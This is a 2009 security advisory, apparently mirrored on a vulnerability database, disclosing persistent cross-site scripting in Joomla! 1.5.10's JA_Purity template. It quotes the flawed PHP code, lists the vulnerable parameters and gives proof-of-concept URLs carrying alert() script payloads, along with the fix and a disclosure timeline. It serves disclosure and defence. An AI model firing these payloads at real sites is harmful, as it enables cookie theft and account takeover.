Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJuan Galiana LaraPACKETSTORM:78116
HistoryJun 05, 2009 - 12:00 a.m.

Joomla! 1.5.10 JA_Purity Cross Site Scripting

2009-06-0500:00:00
Juan Galiana Lara
packetstormsecurity.com
18
JSON
`=============================================  
INTERNET SECURITY AUDITORS ALERT 2009-006  
- Original release date: April 5th, 2009  
- Last revised: June 5th, 2009  
- Discovered by: Juan Galiana Lara  
- Severity: 6.4/10 (CVSS Base Score)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Joomla! 1.5.10 JA_Purity Multiple Persistent XSS  
  
II. BACKGROUND  
-------------------------  
Joomla! is an award-winning content management system (CMS), which  
enables you to build Web sites and powerful online applications. Many  
aspects, including its ease-of-use and extensibility, have made  
Joomla! the most popular Web site software available. Best of all,  
Joomla! is an open source solution that is freely available to everyone.  
Joomla! comes with 3 default templates, JA_Purity is one of them.  
  
III. DESCRIPTION  
-------------------------  
JA_Purity template is bundled in Joomla! and fails to sanitized user  
supplied input. An attacker can inject JavaScript or DHTML that will  
be saved in the cookie making persistent, running in the context of  
targeted user browser, allowing him to steal cookies.  
  
In file 'template/ja_purity/ja_templatetools.php', the  
getUserSetting() reads $_GET array and makes the data persistent  
setting it in a cookie:  
  
4 define ('JA_TOOL_FONT', 'ja_font');  
...  
27 function getUserSetting(){  
28 $exp = time() + 60*60*24*355;  
29 if (isset($_COOKIE[$this->template.'_tpl']) &&  
$_COOKIE[$this->template.'_tpl'] == $this->template){  
30 foreach($this->_params_cookie as $k=>$v) {  
31 $kc = $this->template."_".$k;  
32 if (isset($_GET[$k])){  
33 $v = $_GET[$k];  
34 setcookie ($kc, $v, $exp, '/');  
35 }else{  
36 if (isset($_COOKIE[$kc])){  
37 $v = $_COOKIE[$kc];  
38 }  
39 }  
40 $this->setParam($k, $v);  
41 }  
42  
43 }else{  
44 setcookie ($this->template.'_tpl', $this->template, $exp,  
'/');  
45 }  
46 return $this;  
47 }  
48  
49 function getParam ($param, $default='') {  
50 if (isset($this->_params_cookie[$param])) {  
51 return $this->_params_cookie[$param];  
52 }  
53 return $this->_tpl->params->get($param, $default);  
54 }  
55  
56 function setParam ($param, $value) {  
57 $this->_params_cookie[$param] = $value;  
58 }  
  
File 'template/ja_purity/index.php' reads data with getParam and write  
it directly:  
  
57 <?php if ($tmpTools->getParam('theme_header') &&  
$tmpTools->getParam('theme_header')!='-1') : ?>  
58 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();  
?>/styles/header/<?php echo $tmpTools->getParam('theme_header');  
?>/style.css" type="text/css" />  
59 <?php endif; ?>  
60 <?php if ($tmpTools->getParam('theme_background') &&  
$tmpTools->getParam('theme_background')!='-1') : ?>  
61 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();  
?>/styles/background/<?php echo  
$tmpTools->getParam('theme_background'); ?>/style.css" type="text/css" />  
62 <?php endif; ?>  
63 <?php if ($tmpTools->getParam('theme_elements') &&  
$tmpTools->getParam('theme_elements')!='-1') : ?>  
64 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();  
?>/styles/elements/<?php echo $tmpTools->getParam('theme_elements');  
?>/style.css" type="text/css" />  
65 <?php endif; ?>  
  
99: <body id="bd" class="fs<?php echo  
$tmpTools->getParam(JA_TOOL_FONT);?> <?php echo $tmpTools->browser();?>" >  
  
118 if ($tmpTools->getParam('logoType')=='image'): ?>  
119 <h1 class="logo">  
120 <a href="index.php" title="<?php echo $siteName;  
?>"><span><?php echo $siteName; ?></span></a>  
121 </h1>  
122 <?php else:  
123 $logoText = (trim($tmpTools->getParam('logoText'))=='') ?  
$config->sitename : $tmpTools->getParam('logoText');  
124 $sloganText = (trim($tmpTools->getParam('sloganText'))=='')  
? JText::_('SITE SLOGAN') : $tmpTools->getParam('sloganText'); ?>  
125 <h1 class="logo-text">  
126 <a href="index.php" title="<?php echo $siteName;  
?>"><span><?php echo $logoText; ?></span></a>  
127 </h1>  
128 <p class="site-slogan"><?php echo $sloganText;?></p>  
129 <?php endif; ?>  
  
These are all the variables of JA_Purity template, most of them are  
vulnerable:  
  
logoType  
logoText  
sloganText  
ja_font  
ja_screen  
ja_screen_width  
theme_header  
theme_background  
theme_elements  
horNav  
horNavType  
rightCollapsible  
rightCollapseDefault  
excludeModules  
showComponent  
  
IV. PROOF OF CONCEPT  
-------------------------  
http://site/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E  
http://site/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E  
http://site/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E  
http://site/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E  
http://site/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E  
http://site/path/?excludeModules=%27;alert(8);%20var%20b=%27  
http://site/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27  
http://site/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can exploit the vulnerability to store persistent XSS.  
This may lead in steal the targeted user cookies and gain access to  
the user account.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Joomla! <= 1.5.10 is vulnerable which comes with JA_Purity template 1.2.0  
  
VII. SOLUTION  
-------------------------  
Upgrade to version 1.5.11.  
  
All inputs should be sanitized at setParam/getParam function, in the  
same way is done in libraries/joomla/environment/request.php:140 with  
$var = JRequest::_cleanVar($input[$name], $mask, $type);  
  
VIII. REFERENCES  
-------------------------  
http://www.joomla.org  
http://www.joomlart.org  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered  
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
April 5, 2009: Initial release.  
June 5, 2009: Last revision.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
April 5, 2009: Discovered by Internet Security Auditors.  
April 6, 2009: Vendor contacted. They will study the advisory.  
May-June, 2009: No responses to queries about patching schedule.  
June 3, 2009: Security Release 1.5.11 published.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`
JSON